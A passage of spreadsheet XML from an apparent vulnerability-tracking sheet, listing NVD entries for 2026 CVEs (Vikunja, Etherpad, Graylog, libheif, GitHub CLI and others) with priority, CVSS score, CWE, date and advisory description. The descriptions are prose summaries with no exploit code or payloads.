      <c r="M5093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54741</t>
        </is>
      </c>
    </row>
    <row r="5094">
      <c r="A5094" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5094" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54766</t>
        </is>
      </c>
      <c r="C5094" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5094" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5094" s="5" t="inlineStr"/>
      <c r="F5094" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5094" s="5" t="inlineStr"/>
      <c r="H5094" s="5" t="inlineStr"/>
      <c r="I5094" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5094" s="5" t="inlineStr"/>
      <c r="K5094" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-863</t>
        </is>
      </c>
      <c r="L5094" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. From 0.21.0 until 2.4.0, the project duplication operation in pkg/models/project_duplicate.go allows an authenticated user who can read a source project to place its duplicate beneath an arbitrary target parent project. ProjectDuplicate.CanCreate calls parent.CanCreate on an unhydrated Project containing only the body supplied parent_project_id instead of calling parent.CanWrite, so the target parent write-permission check is skipped. The ordinary project creation path enforces that permission, but PUT /api/v1/projects/{project}/duplicate does not, allowing attacker-owned content to be injected into another user or team project hierarchy. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="M5094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54766</t>
        </is>
      </c>
    </row>
    <row r="5095">
      <c r="A5095" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54909</t>
        </is>
      </c>
      <c r="C5095" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5095" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5095" s="5" t="inlineStr"/>
      <c r="F5095" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5095" s="5" t="inlineStr"/>
      <c r="H5095" s="5" t="inlineStr"/>
      <c r="I5095" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5095" s="5" t="inlineStr"/>
      <c r="K5095" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5095" s="5" t="inlineStr">
        <is>
          <t>pion/stun is a Go implementation of STUN. Prior to 3.1.3, XORMappedAddress.GetFromAs can panic while parsing a malformed short XOR-MAPPED-ADDRESS attribute in STUN or ICE Binding-response parsing paths, allowing remote denial of service. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M5095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54909</t>
        </is>
      </c>
    </row>
    <row r="5096">
      <c r="A5096" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55090</t>
        </is>
      </c>
      <c r="C5096" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5096" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5096" s="5" t="inlineStr"/>
      <c r="F5096" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5096" s="5" t="inlineStr"/>
      <c r="H5096" s="5" t="inlineStr"/>
      <c r="I5096" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5096" s="5" t="inlineStr"/>
      <c r="K5096" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5096" s="5" t="inlineStr">
        <is>
          <t>Etherpad is a real-time collaborative editor. Prior to 3.3.0, getHTMLFromAtext in src/node/utils/ExportHtml.ts interpolates values from the exportHtmlAdditionalTagsWithData plugin hook into span data attributes without HTML attribute escaping. A pad editor can place an attacker-controlled value into the attribute pool through moveOpsToNewPool and AttributePool.putAttrib. When a bundled plugin such as ep_font_color or ep_font_size registers the hook, opening the resulting HTML export causes the value to execute as stored cross-site scripting in the Etherpad origin. This issue is fixed in version 3.3.0.</t>
        </is>
      </c>
      <c r="M5096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55090</t>
        </is>
      </c>
    </row>
    <row r="5097">
      <c r="A5097" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55106</t>
        </is>
      </c>
      <c r="C5097" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5097" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5097" s="5" t="inlineStr"/>
      <c r="F5097" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5097" s="5" t="inlineStr"/>
      <c r="H5097" s="5" t="inlineStr"/>
      <c r="I5097" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5097" s="5" t="inlineStr"/>
      <c r="K5097" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5097" s="5" t="inlineStr">
        <is>
          <t>authentik is an open-source identity provider. Prior to 2026.2.6 and 2026.5.5, a diagnostic action on the LDAP Source API does not enforce the object-level read-authorization filter used by the rest of the API. Any party able to reach the API, including an unauthenticated client, can invoke the diagnostic action against a configured LDAP Source. The server then connects to the upstream directory using the source's configured bind credentials and returns a bounded set of directory entries. The response exposes the distinguished names of those entries and the names of the attributes present on them, revealing directory structure, naming conventions, and the existence of specific accounts and groups, but not attribute values. Deployments without a configured LDAP Source are not affected. This issue is fixed in versions 2026.2.6 and 2026.5.5.</t>
        </is>
      </c>
      <c r="M5097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55106</t>
        </is>
      </c>
    </row>
    <row r="5098">
      <c r="A5098" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55419</t>
        </is>
      </c>
      <c r="C5098" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5098" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5098" s="5" t="inlineStr"/>
      <c r="F5098" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5098" s="5" t="inlineStr"/>
      <c r="H5098" s="5" t="inlineStr"/>
      <c r="I5098" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5098" s="5" t="inlineStr"/>
      <c r="K5098" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L5098" s="5" t="inlineStr">
        <is>
          <t>Reachy Mini is an SDK for controlling Reachy Mini robots. Prior to 1.8.2, the Reachy Mini daemon exposes the /api/media/sounds/upload endpoint implemented by the upload_sound method in src/reachy_mini/daemon/app/routers/media.py without authentication, file-extension checks, content validation, or size validation. The daemon binds to 0.0.0.0 by default and uses permissive CORS allow_origins=["*"], allowing an unauthenticated network attacker to upload arbitrary file types that are written to /tmp/reachy_mini_sounds/&lt;original_filename&gt;. Malicious files can compromise stored-data integrity and can serve as a foothold when combined with other vulnerabilities. This issue is fixed in version 1.8.2.</t>
        </is>
      </c>
      <c r="M5098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55419</t>
        </is>
      </c>
    </row>
    <row r="5099">
      <c r="A5099" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55512</t>
        </is>
      </c>
      <c r="C5099" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5099" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5099" s="5" t="inlineStr"/>
      <c r="F5099" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5099" s="5" t="inlineStr"/>
      <c r="H5099" s="5" t="inlineStr"/>
      <c r="I5099" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5099" s="5" t="inlineStr"/>
      <c r="K5099" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L5099" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. From version 0.2.0 to before version 0.5.0, when OIDC is enabled, GET /ui/oidc/login is reachable without authentication and is registered outside the Web UI rate-limited auth routes. Every request creates a fresh random OIDC state value and stores it in an in-memory map for 10m. Expired states are swept lazily, but there is no rate limit or maximum live-state cap on the allocation path. An unauthenticated remote client can therefore grow OIDC.states for the full state TTL, bounded by request throughput rather than by configured auth rate limits. This issue has been patched in version 0.5.0.</t>
        </is>
      </c>
      <c r="M5099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55512</t>
        </is>
      </c>
    </row>
    <row r="5100">
      <c r="A5100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55619</t>
        </is>
      </c>
      <c r="C5100" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5100" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5100" s="5" t="inlineStr"/>
      <c r="F5100" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5100" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H5100" s="5" t="inlineStr"/>
      <c r="I5100" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5100" s="5" t="inlineStr"/>
      <c r="K5100" s="5" t="inlineStr">
        <is>
          <t>CWE-1124, CWE-770</t>
        </is>
      </c>
      <c r="L5100" s="5" t="inlineStr">
        <is>
          <t>eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to 3.0.2, eml_parser.parser.HeaderParser.header_fetch_parse in eml_parser/parser.py uses email.utils.getaddresses() to parse address-bearing e-mail headers. A deeply nested CFWS comment construct exhausts the standard-library recursive descent parser's call stack and raises RecursionError, which is not caught and therefore aborts parsing of the entire message. An attacker can disrupt SOC pipelines that process untrusted EML files, although callers already need to handle exceptions from malformed or pathological messages. This issue is fixed in version 3.0.2.</t>
        </is>
      </c>
      <c r="M5100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55619</t>
        </is>
      </c>
    </row>
    <row r="5101">
      <c r="A5101" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55624</t>
        </is>
      </c>
      <c r="C5101" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5101" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5101" s="5" t="inlineStr"/>
      <c r="F5101" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5101" s="5" t="inlineStr"/>
      <c r="H5101" s="5" t="inlineStr"/>
      <c r="I5101" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5101" s="5" t="inlineStr"/>
      <c r="K5101" s="5" t="inlineStr">
        <is>
          <t>CWE-670</t>
        </is>
      </c>
      <c r="L5101" s="5" t="inlineStr">
        <is>
          <t>MintyItanium Lost-Auction is an auction plugin for Minecraft. Prior to commit 88c920b05042929db334ba06d57f052b42d6b3f8, players can take items like barrier blocks or duplicate items from the GUI. Commit 88c920b05042929db334ba06d57f052b42d6b3f8 fixes the issue.</t>
        </is>
      </c>
      <c r="M5101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55624</t>
        </is>
      </c>
    </row>
    <row r="5102">
      <c r="A5102" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55777</t>
        </is>
      </c>
      <c r="C5102" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5102" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5102" s="5" t="inlineStr"/>
      <c r="F5102" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5102" s="5" t="inlineStr"/>
      <c r="H5102" s="5" t="inlineStr"/>
      <c r="I5102" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J5102" s="5" t="inlineStr"/>
      <c r="K5102" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5102" s="5" t="inlineStr">
        <is>
          <t>GoAccess is a real-time web log analyzer and interactive viewer that runs in a terminal in *nix systems or through the browser. Prior to 1.11, the parse_ios() function uses an attacker-controlled keyword-to-OS offset as both the source offset and copy length for memmove, allowing a crafted User-Agent in a processed access log to read up to approximately 4 KB beyond the heap allocation and conditionally crash GoAccess. This issue is fixed in version 1.11.</t>
        </is>
      </c>
      <c r="M5102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55777</t>
        </is>
      </c>
    </row>
    <row r="5103">
      <c r="A5103" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55867</t>
        </is>
      </c>
      <c r="C5103" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5103" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5103" s="5" t="inlineStr"/>
      <c r="F5103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5103" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5103" s="5" t="inlineStr"/>
      <c r="I5103" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5103" s="5" t="inlineStr"/>
      <c r="K5103" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5103" s="5" t="inlineStr">
        <is>
          <t>Graylog is a free and open log management platform. From 6.2.0 until 6.3.12, 7.0.7, and 7.1.2, the DELETE /users/{userId}/tokens/{idOrToken} endpoint implemented by UsersResource.revokeToken() in graylog2-server/src/main/java/org/graylog2/rest/resources/users/UsersResource.java checks USERS_TOKENREMOVE permission against the attacker-controlled userId path parameter before resolving the token selected by idOrToken. An authenticated user can provide an authorized userId while accessTokenService.loadById() or accessTokenService.load() resolves a token belonging to another user, including a service account or administrator, after which accessTokenService.destroy() deletes that token without checking AccessToken.getUserName(). The issue does not expose token contents, but unauthorized deletion causes integrity impact and can disrupt access-token-based integrations. This issue is fixed in versions 6.3.12, 7.0.7, and 7.1.2.</t>
        </is>
      </c>
      <c r="M5103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55867</t>
        </is>
      </c>
    </row>
    <row r="5104">
      <c r="A5104" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56704</t>
        </is>
      </c>
      <c r="C5104" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5104" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5104" s="5" t="inlineStr"/>
      <c r="F5104" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5104" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H5104" s="5" t="inlineStr"/>
      <c r="I5104" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5104" s="5" t="inlineStr"/>
      <c r="K5104" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5104" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.4.3 inserts unsanitized database server version strings into script tags with valid CSP nonces without proper validation. Attackers controlling a rogue MySQL server can return crafted version strings that break out of the JavaScript context and execute arbitrary code, bypassing Content Security Policy protections.</t>
        </is>
      </c>
      <c r="M5104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56704</t>
        </is>
      </c>
    </row>
    <row r="5105">
      <c r="A5105" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61632</t>
        </is>
      </c>
      <c r="C5105" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5105" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5105" s="5" t="inlineStr"/>
      <c r="F5105" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5105" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H5105" s="5" t="inlineStr"/>
      <c r="I5105" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5105" s="5" t="inlineStr"/>
      <c r="K5105" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5105" s="5" t="inlineStr">
        <is>
          <t>PyMdown Extensions is a set of extensions for the Python-Markdown markdown project. In versions up to and including 10.21.3, the b64 extension is vulnerable to a path traversal that discloses arbitrary files: it inlines images referenced by &lt;img src="..."&gt; by joining the src onto the configured base_path with os.path.normpath and opening the result directly, without verifying that the resolved path stays inside base_path. As a result, an src containing ../ sequences or an absolute path reads a file outside base_path as long as it has an allowed image extension (.png, .jpg, .jpeg, .gif, .svg), and the file's contents are then base64-encoded into the rendered output, disclosing them. An application that renders untrusted Markdown with pymdownx.b64 enabled can therefore leak the contents of image-extension files readable by the process to whoever controls the Markdown or views the output, a targeted file-read bounded by the extension check. This issue has been fixed in version 11.0.</t>
        </is>
      </c>
      <c r="M5105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61632</t>
        </is>
      </c>
    </row>
    <row r="5106">
      <c r="A5106" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61711</t>
        </is>
      </c>
      <c r="C5106" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5106" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5106" s="5" t="inlineStr"/>
      <c r="F5106" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5106" s="5" t="inlineStr"/>
      <c r="H5106" s="5" t="inlineStr"/>
      <c r="I5106" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5106" s="5" t="inlineStr"/>
      <c r="K5106" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5106" s="5" t="inlineStr">
        <is>
          <t>BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. Prior to 0.31.1, a custom frontend could place an invalid SecurityMode value in a crafted build request, and executor/oci/spec_linux.go treated the unsupported value as a non-sandbox mode without requiring the security.insecure entitlement. This disabled Seccomp and AppArmor protections for the build container even though Linux capabilities remained restricted. This issue is fixed in version 0.31.1.</t>
        </is>
      </c>
      <c r="M5106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61711</t>
        </is>
      </c>
    </row>
    <row r="5107">
      <c r="A5107" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62291</t>
        </is>
      </c>
      <c r="C5107" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5107" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5107" s="5" t="inlineStr"/>
      <c r="F5107" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5107" s="5" t="inlineStr"/>
      <c r="H5107" s="5" t="inlineStr"/>
      <c r="I5107" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5107" s="5" t="inlineStr"/>
      <c r="K5107" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-787</t>
        </is>
      </c>
      <c r="L5107" s="5" t="inlineStr">
        <is>
          <t>libheif is a HEIF and AVIF file format decoder and encoder. In 1.23.0 and earlier, a crafted image sequence with a 2x2 primary plane and a 256x256 auxiliary alpha plane can cause attacker-controlled heap corruption during a normal decode and re-encode workflow. Track_Visual::decode_next_image_sample() calls transfer_channel_from_image_as() without checking that the auxiliary alpha dimensions match the main frame. The resulting inconsistent image reaches heif_track_decode_next_image() and then heif_context_encode_image(). In unc_encoder::encode(), unc_encoder_component_interleave::encode_tile() sizes its buffer with compute_tile_data_size_bytes() using the primary dimensions but copies each component using its actual plane dimensions. The oversized alpha plane is therefore copied beyond the allocation, causing an out-of-bounds write; the inverse size mismatch can also produce an out-of-bounds read. This issue is fixed in version 1.23.1.</t>
        </is>
      </c>
      <c r="M5107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62291</t>
        </is>
      </c>
    </row>
    <row r="5108">
      <c r="A5108" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63435</t>
        </is>
      </c>
      <c r="C5108" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5108" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5108" s="5" t="inlineStr"/>
      <c r="F5108" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5108" s="5" t="inlineStr"/>
      <c r="H5108" s="5" t="inlineStr"/>
      <c r="I5108" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5108" s="5" t="inlineStr"/>
      <c r="K5108" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L5108" s="5" t="inlineStr">
        <is>
          <t>Mail is an internet library for Ruby designed to handle email generation, parsing, and sending. Prior to 2.9.1, Mail::Utilities.q_value_decode and Mail::Utilities.b_value_decode used a single String#match and an overly greedy charset capture to decode only the first RFC 2047 encoded-word and mishandle surrounding or subsequent text. A crafted malformed encoded-word in an address display name or local part could cross ? delimiters and make decoded From, To, or Reply-To header values differ from the raw values inspected by a human reviewer or downstream parser, enabling apparent sender or recipient spoofing, phishing, or authorization-check bypass. This issue is fixed in version 2.9.1.</t>
        </is>
      </c>
      <c r="M5108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63435</t>
        </is>
      </c>
    </row>
    <row r="5109">
      <c r="A5109" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64654</t>
        </is>
      </c>
      <c r="C5109" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5109" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5109" s="5" t="inlineStr"/>
      <c r="F5109" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G5109" s="5" t="inlineStr"/>
      <c r="H5109" s="5" t="inlineStr"/>
      <c r="I5109" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5109" s="5" t="inlineStr"/>
      <c r="K5109" s="5" t="inlineStr">
        <is>
          <t>CWE-150</t>
        </is>
      </c>
      <c r="L5109" s="5" t="inlineStr">
        <is>
          <t>GitHub CLI (gh) is GitHub's official command line tool. Prior to version 2.97.0, multiple GitHub CLI commands printed externally controlled gist, API, pull request, release, codespace, skill, or agent-task content without neutralizing terminal escape sequences. An attacker who can influence that content can embed escape sequences that are interpreted by the terminal of a user who runs an affected command, with impact ranging from cosmetic manipulation of the title or on-screen content to, on some terminal emulators, command execution. This extends the same class of issue as CVE-2026-45803—which addressed only gh run view --log—to the other affected command paths. This issue is fixed in version 2.97.0.</t>
        </is>
      </c>
      <c r="M5109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64654</t>
        </is>
      </c>
    </row>
    <row r="5110">
      <c r="A5110" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64857</t>
        </is>
      </c>
      <c r="C5110" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5110" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5110" s="5" t="inlineStr"/>
      <c r="F5110" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5110" s="5" t="inlineStr"/>
      <c r="H5110" s="5" t="inlineStr"/>
      <c r="I5110" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5110" s="5" t="inlineStr"/>
      <c r="K5110" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="L5110" s="5" t="inlineStr">
        <is>
          <t>tirreno, a security framework, has a session fixation issue in versions prior to 0.10.0. During authentication, tirreno validates the user's credentials and establishes the authenticated session, but it does not call `session_regenerate_id()` afterward. As a result, the session identifier is not rotated on login, it stays the same before and after authentication. An attacker able to fix a known session identifier in a victim's browser (for example through a network man-in-the-middle position, or a separate cross-site scripting or subdomain cookie-injection issue) could then gain access to the victim's authenticated session. The issue is fixed in v0.10.0. The session identifier is now regenerated on successful authentication, and the previous session is destroyed. There is no configuration-level workaround.</t>
        </is>
      </c>
      <c r="M5110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64857</t>
        </is>
      </c>
    </row>
    <row r="5111">
      <c r="A5111" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65841</t>
        </is>
      </c>
      <c r="C5111" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5111" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5111" s="5" t="inlineStr"/>
      <c r="F5111" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5111" s="5" t="inlineStr"/>
      <c r="H5111" s="5" t="inlineStr"/>
      <c r="I5111" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5111" s="5" t="inlineStr"/>
      <c r="K5111" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="L5111" s="5" t="inlineStr">
        <is>
          <t>Jodit Editor is a WYSIWYG editor with a built-in file browser &amp; image editor. Prior to 4.13.6, Jodit's clean-html denyTags filter does not normalize foreign SVG or MathML script node names, allowing a script element nested directly in SVG or MathML to remain in editor.value and execute when content is loaded. This issue is fixed in version 4.13.6.</t>
        </is>
      </c>
      <c r="M5111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65841</t>
        </is>
      </c>
    </row>
    <row r="5112">
      <c r="A5112" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65932</t>
        </is>
      </c>
      <c r="C5112" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5112" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5112" s="5" t="inlineStr"/>
      <c r="F5112" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5112" s="5" t="inlineStr"/>
      <c r="H5112" s="5" t="inlineStr"/>
      <c r="I5112" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5112" s="5" t="inlineStr"/>
      <c r="K5112" s="5" t="inlineStr">
        <is>
          <t>CWE-440</t>
        </is>
      </c>
      <c r="L5112" s="5" t="inlineStr">
        <is>
          <t>The BT122 module stops advertising after receiving a plaintext 'pause enceryption response' message resulting in a denial of service. See vulnerability B-E2 in the related paper below.</t>
        </is>
      </c>
      <c r="M5112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65932</t>
        </is>
      </c>
    </row>
    <row r="5113">
      <c r="A5113" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65933</t>
        </is>
      </c>
